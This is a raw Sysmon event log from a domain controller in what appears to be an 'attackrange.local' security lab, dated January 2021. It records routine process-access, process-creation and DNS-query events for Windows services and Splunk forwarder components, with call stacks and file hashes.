13:09:57.430{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42A5-6000-7C00-000000009A01}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.430{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42A5-6000-7C00-000000009A01}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.265{08A6967A-42A5-6000-7C00-000000009A01}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.040{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.040{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.040{08A6967A-4286-6000-0B00-000000009A01}852_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 10341000x80000000000000002601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.446{08A6967A-42A6-6000-7D00-000000009A01}656648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42A6-6000-7D00-000000009A01}656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42A6-6000-7D00-000000009A01}656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.290{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42A6-6000-7D00-000000009A01}656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:58.108{08A6967A-42A6-6000-7D00-000000009A01}656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.809{08A6967A-4298-6000-3100-000000009A01}2248win-dc-2500fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000002616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:57.524{08A6967A-4288-6000-1100-000000009A01}1192wpad1460-C:\Windows\System32\svchost.exe 10341000x80000000000000002615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42A6-6000-7E00-000000009A01}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:59.133{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 